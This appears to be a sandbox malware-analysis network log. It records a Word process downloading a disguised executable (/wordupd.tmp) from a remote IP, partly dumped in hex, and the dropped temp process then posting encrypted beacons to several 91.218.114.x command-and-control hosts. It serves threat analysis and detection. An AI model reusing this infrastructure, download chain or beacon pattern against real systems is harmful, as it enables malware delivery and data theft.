Nov 6, 2019 14:04:16.980581045 CET	49182	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:16.980860949 CET	49182	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:17.068398952 CET	80	49182	91.218.114.37	192.168.1.16
Nov 6, 2019 14:04:17.068569899 CET	80	49182	91.218.114.37	192.168.1.16
Nov 6, 2019 14:04:17.068744898 CET	49182	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:17.699561119 CET	49183	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:17.782872915 CET	80	49183	91.218.114.37	192.168.1.16
Nov 6, 2019 14:04:17.783245087 CET	49183	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:17.784461975 CET	49183	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:17.867660999 CET	80	49183	91.218.114.37	192.168.1.16
Nov 6, 2019 14:04:35.490189075 CET	49187	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:35.581993103 CET	80	49187	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:35.582129955 CET	49187	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:35.583462954 CET	49187	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:35.583620071 CET	49187	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:35.675175905 CET	80	49187	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:35.675270081 CET	80	49187	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:35.675364017 CET	49187	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:36.028825998 CET	49165	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:36.030021906 CET	49188	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:36.112917900 CET	80	49188	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:36.113081932 CET	49188	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:36.113820076 CET	80	49165	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:36.114128113 CET	49188	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:36.196820974 CET	80	49188	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:36.198661089 CET	80	49188	91.218.114.4	192.168.1.16
Nov 6, 2019 14:04:36.198765993 CET	49188	80	192.168.1.16	91.218.114.4
Nov 6, 2019 14:04:36.277292967 CET	49189	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:04:36.356894970 CET	80	49189	91.218.114.11	192.168.1.16
Nov 6, 2019 14:04:36.357094049 CET	49189	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:04:36.358315945 CET	49189	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:04:36.358477116 CET	49189	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:04:36.437846899 CET	80	49189	91.218.114.11	192.168.1.16
Nov 6, 2019 14:04:36.437875986 CET	80	49189	91.218.114.11	192.168.1.16
Nov 6, 2019 14:04:36.437901974 CET	80	49189	91.218.114.11	192.168.1.16
Nov 6, 2019 14:04:36.438103914 CET	49189	80	192.168.1.16	91.218.114.11
Nov 6, 2019 14:04:36.519948006 CET	49190	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:04:36.598889112 CET	80	49190	91.218.114.25	192.168.1.16
Nov 6, 2019 14:04:36.599086046 CET	49190	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:04:36.601351976 CET	49190	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:04:36.601608992 CET	49190	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:04:36.680182934 CET	80	49190	91.218.114.25	192.168.1.16
Nov 6, 2019 14:04:36.681627989 CET	80	49190	91.218.114.25	192.168.1.16
Nov 6, 2019 14:04:36.682163954 CET	80	49190	91.218.114.25	192.168.1.16
Nov 6, 2019 14:04:36.682286978 CET	49190	80	192.168.1.16	91.218.114.25
Nov 6, 2019 14:04:36.785100937 CET	49191	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:04:36.869113922 CET	80	49191	91.218.114.26	192.168.1.16
Nov 6, 2019 14:04:36.869281054 CET	49191	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:04:36.871021986 CET	49191	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:04:36.871254921 CET	49191	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:04:36.955060959 CET	80	49191	91.218.114.26	192.168.1.16
Nov 6, 2019 14:04:36.955149889 CET	80	49191	91.218.114.26	192.168.1.16
Nov 6, 2019 14:04:36.955168962 CET	80	49191	91.218.114.26	192.168.1.16
Nov 6, 2019 14:04:36.955310106 CET	49191	80	192.168.1.16	91.218.114.26
Nov 6, 2019 14:04:37.075642109 CET	49192	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:04:40.071989059 CET	49192	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:04:46.071491957 CET	49192	80	192.168.1.16	91.218.114.31
Nov 6, 2019 14:04:47.901041985 CET	49183	80	192.168.1.16	91.218.114.37
Nov 6, 2019 14:04:47.959662914 CET	49193	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.045109034 CET	80	49193	91.218.114.38	192.168.1.16
Nov 6, 2019 14:04:48.045326948 CET	49193	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.047976017 CET	49193	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.048655987 CET	49193	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.133347034 CET	80	49193	91.218.114.38	192.168.1.16
Nov 6, 2019 14:04:48.133780956 CET	80	49193	91.218.114.38	192.168.1.16
Nov 6, 2019 14:04:48.133933067 CET	49193	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.340800047 CET	49194	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.429965019 CET	80	49194	91.218.114.38	192.168.1.16
Nov 6, 2019 14:04:48.430094004 CET	49194	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.479062080 CET	49194	80	192.168.1.16	91.218.114.38
Nov 6, 2019 14:04:48.568299055 CET	80	49194	91.218.114.38	192.168.1.16

HTTP Request Dependency Graph

104.168.198.208

91.218.114.4

91.218.114.11

91.218.114.25

91.218.114.26

91.218.114.32

91.218.114.37

91.218.114.38

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49163	104.168.198.208	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:02:48.561966896 CET	0	OUT	GET /wordupd.tmp HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 104.168.198.208 Connection: Keep-Alive
Nov 6, 2019 14:02:48.749274015 CET	1	IN	HTTP/1.1 200 OK Date: Wed, 06 Nov 2019 13:02:48 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Tue, 29 Oct 2019 17:33:53 GMT ETag: "b0e00-59610051d4240" Accept-Ranges: bytes Content-Length: 724480 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 98 74 b8 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 06 00 84 09 00 00 7e 01 00 00 06 00 00 f7 11 00 00 00 90 09 00 00 90 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 0b 00 00 04 00 00 72 03 0c 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 00 50 00 00 00 00 a0 09 00 2c 77 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 48 00 00 00 00 94 09 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 52 7c 09 00 00 10 00 00 00 7e 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 05 00 00 00 90 09 00 00 06 00 00 00 82 09 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 c0 2e 72 73 72 63 00 00 00 82 80 01 00 00 a0 09 00 00 82 01 00 00 88 09 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 c0 00 00 00 00 00 00 00 00 45 00 00 00 00 30 0b 00 00 02 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 c0 00 00 00 00 00 00 00 00 56 00 00 00 00 40 0b 00 00 02 00 00 00 0c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 c0 c3 9e a6 55 20 00 00 00 e2 83 3a 55 2d 00 00 00 84 81 03 48 3a 00 00 00 00 00 00 00 00 00 00 00 6b 65 72 6e 65 6c 33 32 2e 64 6c 6c 00 63 6f 6d 63 74 6c 33 32 2e 64 6c 6c 00 47 64 69 50 6c 75 73 2e 64 6c 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELt]~@Pr P,w@H,.textR\|~ `.data@.rsrc`E0 V@ U :U-H:kernel32.dllcomctl32.dllGdiPlus.dll
Nov 6, 2019 14:02:48.749313116 CET	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: UPQRVW}!U#D2@%EIrY%hUED2@q%EZM#UEED2@@2@~-0E3@2@(1UD2@
Nov 6, 2019 14:02:48.749438047 CET	4	IN	Data Raw: 48 33 d2 81 e0 31 2d 00 00 81 8b 80 32 40 00 0b f3 00 00 35 db 52 00 00 35 cc a2 00 00 25 17 27 00 00 23 ce 85 45 fc ff b3 cc 91 49 00 ff b3 d0 91 49 00 56 e8 64 5a 00 00 09 4d 08 81 83 84 32 40 00 00 7d 00 00 33 75 fc 81 f0 b5 6d 00 00 25 72 17 Data Ascii: H31-2@5R5%'#EIIVdZM2@}3um%r>M2@2@M}5E1!UB-7@7@7@US_^ZYXUPQRVW5M%%2@"E4X7@
Nov 6, 2019 14:02:48.749511003 CET	5	IN	Data Raw: 35 2a 2a 00 00 31 83 68 34 40 00 25 00 00 00 00 21 8b 6c 34 40 00 89 75 f8 ff 8b 68 34 40 00 35 00 00 00 00 81 c6 2e 41 00 00 81 a3 68 34 40 00 d4 47 00 00 47 2d 5a f1 00 00 35 d6 1b 00 00 09 93 68 34 40 00 85 ce 81 f7 34 70 00 00 f7 83 6c 34 40 Data Ascii: 5**1h4@%!l4@uh4@5.Ah4@GG-Z5h4@4pl4@=+uIuEUMl4@l4@JIh4@-l4@-2Bh4@E5ZG7,I5h4@meh4@Wu-2
Nov 6, 2019 14:02:48.749742031 CET	6	IN	Data Raw: 01 bb e4 34 40 00 85 93 e4 34 40 00 c7 83 e0 34 40 00 54 ef 00 00 25 00 00 00 00 01 83 e0 34 40 00 81 a3 e4 34 40 00 df f1 00 00 81 ee a6 17 00 00 53 e8 a5 7c 00 00 4e ff 8b e4 34 40 00 09 4d 08 46 01 55 f8 ff 45 fc 81 f0 db 9e 00 00 25 1d f9 00 Data Ascii: 4@4@4@T%4@4@S\|N4@MFUE%4@5J#-24@4@j+4@MhIlIpIDm3M';9@MJE8%(4@@U4@4@E%HEu
Nov 6, 2019 14:02:48.749771118 CET	8	IN	Data Raw: 98 32 40 00 54 9a 00 00 f7 83 98 32 40 00 bf ab 00 00 25 f8 8b 00 00 2b 7d 08 33 f0 83 65 fc 00 25 ca f9 00 00 2d 5d c9 00 00 35 0f 0b 00 00 81 e9 19 53 00 00 81 65 10 ac f7 00 00 ff b3 44 37 40 00 ff b3 48 37 40 00 e8 26 94 00 00 81 b3 98 32 40 Data Ascii: 2@T2@%+}3e%-]5SeD7@H7@&2@M_^ZYXUPQRVWefM4@I3-RU@I=&_4@3uE>E4@*4@z-M}ucp
Nov 6, 2019 14:02:48.750088930 CET	9	IN	Data Raw: 4a 85 7d 0c c7 45 0c a3 9e 00 00 81 e7 86 9b 00 00 42 29 55 0c 85 bb e8 31 40 00 81 45 08 cc 9a 00 00 2b 7d fc b8 51 a0 00 00 2b ce 35 00 00 00 00 0b c7 83 e7 00 81 ab e8 31 40 00 c6 cf 00 00 85 7d fc c7 45 fc d5 75 00 00 29 75 fc 21 55 fc 4e 42 Data Ascii: J}EB)U1@E+}Q+51@}Eu)u!UNBU1@1@1@YMb5EBj5@5@x!UI1@>u55@5@5@jH-%1@Eo}
Nov 6, 2019 14:02:48.750133038 CET	10	IN	Data Raw: 00 00 00 ff b3 d0 37 40 00 ff b3 d4 37 40 00 ff b3 d8 37 40 00 e8 03 eb ff ff 81 f6 39 3c 00 00 21 55 fc 83 ce 00 81 ee dc d0 00 00 0b fe c7 45 f8 b3 07 00 00 ff b3 90 92 49 00 50 e8 08 30 00 00 81 6d fc ab 85 00 00 81 c6 2b 6c 00 00 23 f2 81 b3 Data Ascii: 7@7@7@9<!UEIP0m+l#3@7@i%t2-W%%3J53@,z)E-Vo3@e41N5EHuf1U!EE3@(mDu%ha3
Nov 6, 2019 14:02:48.750420094 CET	11	IN	Data Raw: 82 b5 00 00 2b c7 2b d1 81 ce 8a cb 00 00 c7 83 0c 34 40 00 b9 1b 00 00 05 0c c6 00 00 81 75 fc 87 1d 00 00 83 4d fc 00 c7 83 0c 34 40 00 b1 3a 00 00 b9 c9 99 00 00 29 45 fc 89 8b 08 34 40 00 4a 81 75 08 a3 84 00 00 81 75 fc 04 24 00 00 81 e6 47 Data Ascii: ++4@uM4@:)E4@Juu$Gy+A-_^ZYXUPQRVW!EUEEMH-03@{!UMM#}1u8R(>3}M4BH--^%
Nov 6, 2019 14:02:48.750458956 CET	13	IN	Data Raw: e7 00 25 00 00 00 00 35 42 63 00 00 ff 45 fc ff 45 f8 85 4d 08 48 33 4d f8 4e 81 e6 8b ed 00 00 83 f1 00 81 4d 08 f6 26 00 00 31 7d f8 31 b3 28 35 40 00 81 ee a3 a6 00 00 81 ce 92 26 00 00 03 75 fc 35 00 00 00 00 01 7d fc 47 85 8b 2c 35 40 00 2d Data Ascii: %5BcEEMH3MNM&1}1(5@&u5}G,5@-;_^ZYXUPQRVW%1@pItIF=)1@%Y1@u1EMUmnMe}MeM1@\|O,-XudI
Nov 6, 2019 14:02:48.936714888 CET	14	IN	Data Raw: 75 f8 21 75 f8 c7 45 f8 fb 82 00 00 31 83 4c 34 40 00 ff b3 48 39 40 00 e8 76 14 00 00 81 83 48 34 40 00 5e 1b 00 00 83 f2 00 35 bd 91 00 00 29 4d 08 81 75 08 bf ed 00 00 0b 93 48 34 40 00 48 81 65 08 2e 4b 00 00 35 8e 5b 00 00 0b d7 33 93 48 34 Data Ascii: u!uE1L4@H9@vH4@^5)MuH4@He.K5[3H4@@'-H4@EWE*}H4@!L4@kFM5k5)H4@III}5?3L4@M5#<MMH4@

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.16	49164	91.218.114.4	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:03:09.538314104 CET	759	OUT	POST /signout/login/ct.html HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.4 Content-Type: application/x-www-form-urlencoded Content-Length: 237 Connection: Keep-Alive Data Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)sOf8$+1e?BXCdjUd{5t#S/$MZ/SLpm9)8ay6k{J?w"e]{wfCC`u6V.pb,Jgr{UV

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.1.16	49188	91.218.114.4	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:36.114128113 CET	774	OUT	POST /payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4 HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.4 Content-Length: 49 Cache-Control: no-cache Data Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Nov 6, 2019 14:04:36.198661089 CET	775	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 06 Nov 2019 13:04:34 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 226 Connection: keep-alive Keep-Alive: timeout=60 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 61 79 6f 75 74 2f 61 63 63 6f 75 6e 74 2f 70 66 6d 6f 6e 71 61 76 72 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /payout/account/pfmonqavr.cgi was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.1.16	49189	91.218.114.11	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:36.358315945 CET	775	OUT	POST /view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.11 Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: Keep-Alive Data Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Nov 6, 2019 14:04:36.437875986 CET	776	IN	HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2019 13:04:34 GMT Server: Apache/2.4.25 (Debian) Content-Length: 293 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 69 65 77 2f 70 6d 70 74 62 75 64 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 32 31 38 2e 31 31 34 2e 31 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /view/pmptbud.cgi was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at 91.218.114.11 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.1.16	49190	91.218.114.25	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:36.601351976 CET	777	OUT	POST /tracker/lpvotht.php?ij=74lh01y&if=3h00sur HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.25 Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: Keep-Alive Data Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Nov 6, 2019 14:04:36.681627989 CET	777	IN	HTTP/1.1 403 Forbidden Server: nginx Content-Type: text/html; charset=utf-8 Content-Length: 148 Date: Wed, 06 Nov 2019 13:04:34 GMT Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.1.16	49191	91.218.114.26	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
Nov 6, 2019 14:04:36.871021986 CET	778	OUT	POST /weu.html?n=641&uy=33vt2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko Host: 91.218.114.26 Content-Type: application/x-www-form-urlencoded Content-Length: 49 Connection: Keep-Alive Data Raw: 13 39 7b 32 5c 50 1e 3b e1 eb 31 24 d1 cb 1c a9 42 30 a5 12 6f 1b 8d 56 2e 78 13 ac 44 3f 25 db 2a 4c f4 ec 35 ab 00 2c 9a ab 05 e0 e5 56 a3 cc 34 Data Ascii: 9{2\P;1$B0oV.xD?%*L5,V4
Nov 6, 2019 14:04:36.955149889 CET	778	IN	HTTP/1.1 404 Not Found Date: Wed, 06 Nov 2019 13:04:35 GMT Server: Apache/2.4.10 (Debian) Content-Length: 285 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 65 75 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 31 2e 32 31 38 2e 31 31 34 2e 32 36 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /weu.html was not found on this server.</p><hr><address>Apache/2.4.10 (Debian) Server at 91.218.114.26 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.1.16	49193	91.218.114.38	80	C:\Windows\Temp\wupd12.14.tmp

Timestamp	kBytes transferred	Direction	Data
